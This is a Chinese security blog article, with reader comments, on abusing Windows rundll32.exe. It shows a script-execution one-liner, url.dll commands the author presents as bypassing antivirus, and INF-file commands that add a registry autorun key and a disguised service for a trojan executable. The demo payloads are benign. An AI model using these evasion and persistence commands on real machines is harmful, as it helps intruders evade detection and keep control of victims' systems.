rundll.32
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
命令行下的“蒙面歌王”rundll32.exe lcx2018-01-29现金奖励共555658人围观 ,发现 15 个不明物体 工具
*本文原创作者:lcx,本文属FreeBuf原创奖励计划,未经许可禁止转载
在Windows系统中,为了节省内存和实现代码重用,微软在Windows操作系统中实现了一种共享函数库的方式。这就是DLL(Dynamic Link Library)文件,即动态链接库,这种库包含了可由多个程序同时使用的代码和数据。Rundll.exe 和 Rundll32.exe 的命令行实用程序,通过这两个程序可调用从16位或32位DLL导出的函数。现在Rundll.exe 基本被淘汰,rundll32.exe格式为:RUNDLL32.EXE
一、用C++如何写一个简单的被Rundll32.exe调用的dll
我用Visual studio 2017写了一个简单的代码,内容如下:
// Dll3.cpp: 定义 DLL 应用程序的导出函数。
//
#include "stdafx.h"
#include
extern "C" __declspec(dllexport)
void F2(
HWND hwnd, // handle to owner window
HINSTANCE hinst, // instance handle for the DLL
LPTSTR lpCmdLine, // string the DLL will parse
int nCmdShow // show state
)
{
if (strlen(lpCmdLine) != 0)
{
CString num;
num = lpCmdLine;
MessageBox(0, "Message body", num ,MB_OK);
}
else
{
MessageBox(0, "Message body", "Message title", MB_OK);
}
}
全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。
二、用Rundll32.exe运行js或vbs的脚本代码
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('a')","vbs");window.close()
53fb0001b6c5c3d8832e.gif
动画里这条命令烂大街了,已经绕不过我本机的火绒了。
三、用Rundll32.exe执行命令绕过杀毒软件的作法
命令如下:
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
rundll32 url.dll, FileProtocolHandler calc.exe
这是经过反汇编分析url.dll得出的结果,请记住这3条命令,活学活用,这是干货。上边的三条命令都可以绕开我本机的火绒。你可以多分析system32下的dll,说不定你还有惊喜。
四、用Rundll32.exe修改注册表
写一个c:/reg.inf文件,增加注册表启动项,代码如下:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun,0x00000000,c:/muma.exe
然后我们运行
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf
就可以增加一个键为KAVRun,值为c:/muma.exe的注册表项了。
5.png
删掉刚才加的注册表启动项,c:\reg.inf内容如下:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_DelReg_Name]
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun
运行以下命令就可以删掉了
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf
几点说明:
[Version]和[DefaultInstall]是必须的,AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
0×00010001表示REG_DWORD数据类型,0×00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0×00020000表示REG_EXPAND_SZ。关于inf文件的详细信息,可以参考DDK帮助文档。
InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号,没有空格。128表示给定路径,该参数其他取值及含义参见MSDN。特别注意,最后一个参数,必须是inf文件的全路径,不要用相对路径。
inf文件中的项目都是大小写不敏感的。
五、使用rundll32.exe 增加一个服务
写一个srv.inf,内容如下:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\muma.exe
然后执行命令,会增加一个名字为inetsvr的服务。
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/srv.inf
几点说明:
ServiceType表示服务类型:0×10为独立进程服务,0×20为共享进程服务(比如svchost);
StartType表示启动类型:0 系统引导时加载,1 OS初始化时加载,2 由SCM(服务控制管理器)自动启动,3 手动启动,4 禁用。
ErrorControl表示错误控制:0 忽略,1 继续并警告,2 切换到LastKnownGood的设置,3 蓝屏。
ServiceBinary里的服务程序位置:%11%表示system32目录,%10%表示系统目录(WINNT或Windows),%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量,直接使用全路径。
这四项是必须要有的。
删除刚才增加的服务,写一个dsrv.inf,内容如下:
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
DelService=inetsvr
执行完以下命令就会删掉了
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/dsrv.inf
INF的具体参数是请查看DDK相关资料。
六、网上老生常谈的rundll32的几十个常用快捷命令了,可能有些人并不清楚
命令列: rundll32.exe shell32.dll,Control_RunDLL
功能: 显示控制面板
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
功能: 显示“控制面板-辅助选项-键盘”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
功能: 显示“控制面板-辅助选项-声音”选项视窗
……
还有太多太多,我如果写在文章里就全是水份了,具体其它命令请参阅:老生常谈的一些命令
另:本文中的修改注册表和增删服务参考了zzzevazzz的《Do All in Cmd Shell (一切尽在命令行)》部分内容,表示感谢。
*本文原创作者:lcx,本文属FreeBuf原创奖励计划,未经许可禁止转载
lcx
5 篇文章
等级: 3级
||
上一篇:EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具下一篇:硬件黑客工具Packet Squirrel之三:Payload开发介绍
这些评论亮了
火绒 回复
已加入我司规则库
)117(亮了
lcx (3级)回复
@ CE安全网 我和他不是同一个人,我晕。他的网站叫lcx.cc而已。我的ID是lcx。搜索一下海阳顶端的作者。
)23(亮了
发表评论已有 15 条评论
火绒 2018-01-29回复 1楼
已加入我司规则库
亮了(117)
举一反三 2018-01-29回复 2楼
你发出来的时候所有的都过不了火绒了。
亮了(3)
5555 2018-01-29回复 3楼
完了,发出来一会就被封了。
亮了(0)
凌风驾驭 (1级) 2018-01-29回复 4楼
领教了!!!
亮了(0)
CE安全网 2018-01-29回复 5楼
核jj 你的博客咋没了。。。
亮了(0)
lcx (3级) 2018-01-29回复
@ CE安全网 我和他不是同一个人,我晕。他的网站叫lcx.cc而已。我的ID是lcx。搜索一下海阳顶端的作者。
亮了(23)
LiDogEgg (1级) 2018-01-29回复 6楼
这个666
亮了(0)
吐家妹 2018-01-29回复 7楼
被麦咖啡拦截了……
亮了(0)
陆仁甲 (2级) echo exp(www.baidu.com,timeout... 2018-01-29回复 8楼
C++ 多么牛X 的编程语言 ,长时间不写C++程序, 都生疏了, 想作者学习了。 
亮了(2)
sarski (2级) 2018-01-29回复 9楼
404,,,
亮了(0)
111 2018-01-29回复 10楼
膜拜李春晓大神,现在居然出来发文章了,期待更多文章
亮了(3)
lcx (3级) 2018-01-29回复
@ 111 我在今日头条上写了好多了。好多技巧都在今日头条上公布了,欢迎关注,名字是海阳顶端。
亮了(0)
He1en 2018-01-30回复
@ lcx 膜拜赖昌星大神
亮了(3)
yllen 2018-01-29回复 11楼
前排围观作者访谈录:http://blog.csdn.net/shankaipingo/article/details/5974110
亮了(0)
互联网的帽子戏法 (2级) 2018-02-06回复 12楼
大神精通Windows各种技巧,666。
16年开始,陆陆续续的钓鱼都是powershell vbs hta 攻击手法.
市面上还是很少有如何发邮件,如何伪造发件人姿势的技术方法文章.
http://blog.csdn.net/qq_27446553/article/details/78927725
我用这个测试还挺好用的,不知道大神有没有更好的姿势
亮了(0)
昵称
请输入昵称
必须您当前尚未登录。登陆?注册邮箱
请输入邮箱地址
必须(保密)表情插图
有人回复时邮件通知我
lcx
这家伙太懒,还未填写个人描述!
5
文章数
27
评论数
最近文章
捡拾VBS应用层里的明珠
2018.02.22
命令行下的“蒙面歌王”rundll32.exe
2018.01.29
浅谈一下mshta在CVE-2017-11882里的命令构造
2017.12.01
浏览更多
相关阅读
御剑web指纹识别程序(新出的一款WIN平台CMS指纹识别小工具)使用Docker构建Web渗透测试工具容器知名渗透测试厂商团队的报告模板(含下载)透析挖洞神器mona.py插件新特性Jenkins CommonCollections 漏洞完美利用工具
特别推荐
关注我们 分享每日精选文章
活动预告
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)
已结束
10月
【首节课仅需1元】挖掘CVE不是梦
已结束
9月
【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php0daybank
文章评论